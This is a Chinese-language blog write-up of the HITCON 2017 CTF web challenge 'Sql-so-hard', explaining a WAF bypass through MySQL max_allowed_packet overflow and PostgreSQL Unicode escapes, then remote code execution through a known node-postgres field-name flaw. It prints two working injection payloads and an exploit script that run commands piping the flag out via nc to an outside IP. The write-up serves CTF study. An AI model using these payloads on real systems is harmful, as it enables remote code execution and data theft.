<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <title>[hitcon2017] Sql-so-hard 复现 | Pr0ph3t</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="最近实在是太多事情了Orz，所以没有及时更新复现。。(其实是偷懒  分享本题自制Dockerfile：Github   这道题涉及到的知识点：   * mysql的max_allowed_packet  * node-postgresql的一个RCE  * postgresql中语句返回值的问题  本题连接了两个数据库 一个是mysql–用作waf之后ip和payload记录，另外一个是postg">
<meta name="keywords" content="CyberSecurity,old,writeup,hitcon">
<meta property="og:type" content="article">
<meta property="og:title" content="[hitcon2017] Sql-so-hard 复现">
<meta property="og:url" content="https://blog.pr0ph3t.com/2018/01/08/hitcon2017-Sql-so-hard-复现/index.html">
<meta property="og:site_name" content="Pr0ph3t">
<meta property="og:description" content="最近实在是太多事情了Orz，所以没有及时更新复现。。(其实是偷懒  分享本题自制Dockerfile：Github   这道题涉及到的知识点：   * mysql的max_allowed_packet  * node-postgresql的一个RCE  * postgresql中语句返回值的问题  本题连接了两个数据库 一个是mysql–用作waf之后ip和payload记录，另外一个是postg">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-bb83cdbe939a1425.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-07-06T09:55:30.755Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[hitcon2017] Sql-so-hard 复现">
<meta name="twitter:description" content="最近实在是太多事情了Orz，所以没有及时更新复现。。(其实是偷懒  分享本题自制Dockerfile：Github   这道题涉及到的知识点：   * mysql的max_allowed_packet  * node-postgresql的一个RCE  * postgresql中语句返回值的问题  本题连接了两个数据库 一个是mysql–用作waf之后ip和payload记录，另外一个是postg">
<meta name="twitter:image" content="http://upload-images.jianshu.io/upload_images/6949366-bb83cdbe939a1425.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
  
    <link rel="alternative" href="/atom.xml" title="Pr0ph3t" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.webp" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">Pr0ph3t</a></h1>
        </hgroup>

        
        <p class="header-subtitle">菜菜菜</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/articles">文章</a></li>
                        
                            <li><a href="/about">关于我</a></li>
                        
                            <li><a href="/tags">tags</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="mailto://admin@pr0ph3t.com" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/Pr0phet" title="github">github</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Attack-Defense/" style="font-size: 12.5px;">Attack&Defense</a> <a href="/tags/CyberSecurity/" style="font-size: 20px;">CyberSecurity</a> <a href="/tags/crypto/" style="font-size: 10px;">crypto</a> <a href="/tags/hitcon/" style="font-size: 15px;">hitcon</a> <a href="/tags/old/" style="font-size: 20px;">old</a> <a href="/tags/writeup/" style="font-size: 17.5px;">writeup</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://aluvion.github.io">twings</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://blog.de1ta.club">De1ta</a>
                    
                    </div>
                </section>
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">Pr0ph3t</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.webp" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">Pr0ph3t</a></h1>
            </hgroup>
            
            <p class="header-subtitle">菜菜菜</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/articles">文章</a></li>
                
                    <li><a href="/about">关于我</a></li>
                
                    <li><a href="/tags">tags</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="mailto://admin@pr0ph3t.com" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/Pr0phet" title="github">github</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-hitcon2017-Sql-so-hard-复现" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2018/01/08/hitcon2017-Sql-so-hard-复现/" class="article-date">
      <time datetime="2018-01-08T12:09:00.000Z" itemprop="datePublished">2018-01-08</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      [hitcon2017] Sql-so-hard 复现
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CyberSecurity/">CyberSecurity</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hitcon/">hitcon</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/old/">old</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/writeup/">writeup</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>最近实在是太多事情了Orz，所以没有及时更新复现。。(其实是偷懒</p>
<p>分享本题自制Dockerfile：<a href="https://github.com/Pr0phet/hitcon2017Dockerfile/tree/master/hitcon-ctf-2017/sql-so-hard" target="_blank" rel="noopener">Github</a> </p>
<p>这道题涉及到的知识点：</p>
<ul>
<li>mysql的<em>max_allowed_packet</em></li>
<li>node-postgresql的一个RCE</li>
<li>postgresql中语句返回值的问题</li>
</ul>
<p>本题连接了两个数据库 一个是mysql–用作waf之后ip和payload记录，另外一个是postgresql–用作注册时记录用户名称和密码</p>
<p>因为主要是分析大大的payload为主，这里的考察点主要是node-postgresql近期的一个RCE漏洞(<a href="https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability" target="_blank" rel="noopener">https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability</a>)</p>
<p>这个洞详细的分析P神已经在博客贴出来了(<a href="https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html</a>)<br>并且复现环境p神也已经写了Dockerfile(<a href="https://github.com/vulhub/vulhub/tree/master/node/node-postgres" target="_blank" rel="noopener">https://github.com/vulhub/vulhub/tree/master/node/node-postgres</a>)</p>
<p>简单来说就是客户端在获取表字段的时候因为转译不完全导致原本应该拼接在代码中的字段名被构造成了恶意代码传入了Function()这个类，这个类类似于PHP中的create_function，因为函数体可控 ,也就造成了命令执行。然后官方也有转译，但是官方的转译只是把<strong>‘ –&gt; \‘</strong> ， 所以在前面加个\就能逃逸出来（逃逸后的字符串就是 <strong>\\‘</strong>）</p>
<p>所以这里的目的就很明确了 –&gt; 通过postgresql的注入造成代码拼接命令执行<br>ß<br>但是会遇到两个问题：</p>
<ol>
<li>这里postgresql存在注入 但是首先得绕过一大堆关键字waf</li>
<li>我们的ip不能在mysql留下记录 （这里的waf思路是如果有keyword则插入记录 后面再查询，如果有记录则拦截）</li>
</ol>
<p>思路：</p>
<ul>
<li><p>造成Mysql插入出错<br>提交一个很长很长的查询（默认包大小为16M），超出max_allowed_packet造成连接关闭，sql语句就不会执行 官方文档：<img src="http://upload-images.jianshu.io/upload_images/6949366-bb83cdbe939a1425.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="max_allowed_packet"><br>这样没有插入的话就不会查询到记录，即达到<strong>绕过waf</strong>的目的</p>
</li>
<li><p>或者使用postgreSQL支持将16进制的值转换成Unicode字符、并且可以自定义转译符的<a href="https://www.postgresql.org/docs/9.6/static/sql-syntax-lexical.html" target="_blank" rel="noopener">特性</a>来将关键字全部替换掉, 从而达到<strong>绕过waf</strong>的目的, Eg: 国外大佬的<a href="https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md" target="_blank" rel="noopener">wp</a>(其中空格使用\t绕过,自定义转译符为感叹号)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;,&apos;&apos;)\tON\tCONFLICT\t(username)\tDO\tUPDATE\tSET\tusername=&apos;&apos;\tRETURNING\t1\tAS\tU&amp;&quot;!005c!0027+(r=process.mainModule.require,l=!0022!0022)]!002f!002f&quot;\tUESCAPE\t&apos;!&apos;,\t1\tAS\tU&amp;&quot;!005c!0027+(l+=!0022!002freadflag|nc!0020123.123!0022)]!002f!002f&quot;\tUESCAPE\t&apos;!&apos;,\t1\tAS\tU&amp;&quot;!005c!0027+(l+=!0022.123.123!00201234!0022)]!002f!002f&quot;\tUESCAPE\t&apos;!&apos;,\t1\tAS\tU&amp;&quot;!005c!0027+(r(!0022child_process!0022).execSync(l))]!002f!002f&quot;\tUESCAPE\t&apos;!&apos;;</span><br></pre></td></tr></table></figure>
</li>
<li><p>构造RCE代码<a href="https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability" target="_blank" rel="noopener">2017-08-12 - code execution vulnerability</a><br>目的是构造相应的字段名称造成RCE（详细原因请看P神关于漏洞的<a href="https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html" target="_blank" rel="noopener">分析</a>）<br>这里会出现新问题：</p>
<ul>
<li>不能控制insert的字段名，并且insert没有返回值(?)</li>
<li>这里利用了分号切割sql语句，不能通过;闭合sql语句的方式构造RCE</li>
</ul>
</li>
</ul>
<p>这里阅读 <a href="https://www.postgresql.org/docs/9.5/static/dml-returning.html" target="_blank" rel="noopener">文档</a>, postgresql允许在insert或者update后选择一个或多个字段返回, 所以在这里就有可控字段名了, 使用格式 <code>insert into xx(aa,bb) values(&#39;cc&#39;,&#39;dd&#39;) returning  ee as ff;</code><br>最后就是构造RCE中P神在博客中提到的</p>
<blockquote>
<p>单双引号都不能正常使用，我们可以使用es6中的反引号<br><code>Function</code>环境下没有<code>require</code>函数, 不能获得<code>child_process</code>模块, 但是可以通过<code>process.mainModule.constructor._load</code>来代替require<br>一个fieldName只能有64位长度, 所以通过多个fieldName拼接来完成利用</p>
</blockquote>
<p>最后是orange大大的exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> random <span class="keyword">import</span> randint</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="comment"># payload = "union"</span></span><br><span class="line">payload = <span class="string">"""','')/*%s*/returning(1)as"\\'/*",(1)as"\\'*/-(a=`child_process`)/*",(2)as"\\'*/-(b=`/readflag|nc 10.188.2.20 9999`)/*",(3)as"\\'*/-console.log(process.mainModule.require(a).exec(b))]=1//"--"""</span> % (<span class="string">' '</span>*<span class="number">1024</span>*<span class="number">1024</span>*<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">username = str(randint(<span class="number">1</span>, <span class="number">65535</span>))+str(randint(<span class="number">1</span>, <span class="number">65535</span>))+str(randint(<span class="number">1</span>, <span class="number">65535</span>))</span><br><span class="line">data = &#123;</span><br><span class="line">            <span class="string">'username'</span>: username+payload, </span><br><span class="line">                <span class="string">'password'</span>: <span class="string">'AAAAAA'</span></span><br><span class="line">                &#125;</span><br><span class="line"><span class="keyword">print</span> <span class="string">'ok'</span></span><br><span class="line">r = requests.post(<span class="string">'http://10.188.2.20:12345/reg'</span>, data=data);</span><br><span class="line"><span class="keyword">print</span> r.content</span><br></pre></td></tr></table></figure>

<p>参考:<br><a href="https://github.com/orangetw/My-CTF-Web-Challenges" target="_blank" rel="noopener">https://github.com/orangetw/My-CTF-Web-Challenges</a><br><a href="https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html</a><br><a href="https://github.com/vulhub/vulhub/tree/master/node/node-postgres" target="_blank" rel="noopener">https://github.com/vulhub/vulhub/tree/master/node/node-postgres</a><br><a href="https://www.postgresql.org/docs/9.6/static/sql-syntax-lexical.html" target="_blank" rel="noopener">https://www.postgresql.org/docs/9.6/static/sql-syntax-lexical.html</a><br><a href="https://www.postgresql.org/docs/9.5/static/dml-returning.html" target="_blank" rel="noopener">https://www.postgresql.org/docs/9.5/static/dml-returning.html</a><br><a href="https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md" target="_blank" rel="noopener">https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md</a><br><a href="https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability" target="_blank" rel="noopener">https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability</a></p>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2018/01/08/hitcon2017-Sql-so-hard-复现/">[hitcon2017] Sql-so-hard 复现</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 Pr0ph3t 的个人博客">Pr0ph3t</a></p>
        <p><span>发布时间:</span>2018年01月08日 - 20时09分</p>
        <p><span>最后更新:</span>2019年07月06日 - 17时55分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2018/01/08/hitcon2017-Sql-so-hard-复现/" title="[hitcon2017] Sql-so-hard 复现">https://blog.pr0ph3t.com/2018/01/08/hitcon2017-Sql-so-hard-复现/</a>
            <span class="copy-path" data-clipboard-text="原文: https://blog.pr0ph3t.com/2018/01/08/hitcon2017-Sql-so-hard-复现/　　作者: Pr0ph3t" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2018/01/14/hitcon2017-SSRF-Me复现/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          [hitcon2017] SSRF Me复现
        
      </div>
    </a>
  
  
    <a href="/2017/12/23/2017-X-NUCA-总决赛小结/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">[2017 X-NUCA]总决赛小结</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>







    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2018/01/14/hitcon2017-SSRF-Me复现/" title="上一篇: [hitcon2017] SSRF Me复现">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2017/12/23/2017-X-NUCA-总决赛小结/" title="下一篇: [2017 X-NUCA]总决赛小结">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/07/06/hello-world/">Hello World</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/01/题目-记一次利用gopher的内网mysql盲注/">[题目]记一次利用gopher的内网mysql盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/03/hitctf-Web-Writeup/">[hitctf] Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/26/hitcon2017-Baby-H-master-php-2017-复现/">[hitcon2017] Baby^H-master-php-2017 复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/14/hitcon2017-SSRF-Me复现/">[hitcon2017] SSRF Me复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/08/hitcon2017-Sql-so-hard-复现/">[hitcon2017] Sql-so-hard 复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/23/2017-X-NUCA-总决赛小结/">[2017 X-NUCA]总决赛小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/27/hitcon2017-BabyFirst-Revenge-V2复现/">[hitcon2017] BabyFirst Revenge V2复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/26/hitcon2017-BabyFirst-Revenge复现/">[hitcon2017] BabyFirst Revenge复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/08/Web狗要懂的Padding-Oracle攻击/">Web狗要懂的Padding Oracle攻击</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/24/Web狗要懂的CBC翻转字节攻击-Flipped-Ciphertext-Bits/">Web狗要懂的CBC翻转字节攻击(Flipped Ciphertext Bits)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/10/2017世安杯-决赛Writeup/">[2017世安杯] 决赛Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/09/2017世安杯-初赛Web-Writeup/">[2017世安杯] 初赛Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/24/2017强网杯-线下总结/">[2017强网杯] 线下总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/19/2017WHCTF-Web详细复现-伪-WP/">[2017WHCTF] Web详细复现(伪)WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/11/2017强网杯-Web-Writeup/">[2017强网杯] Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/15/XMAN-线下赛总结/">[XMAN] 线下赛总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/14/2017X-nuca-赛前热身Writeup/">[2017X-nuca] 赛前热身Writeup</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 Pr0ph3t
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-87275583-1', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->




<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>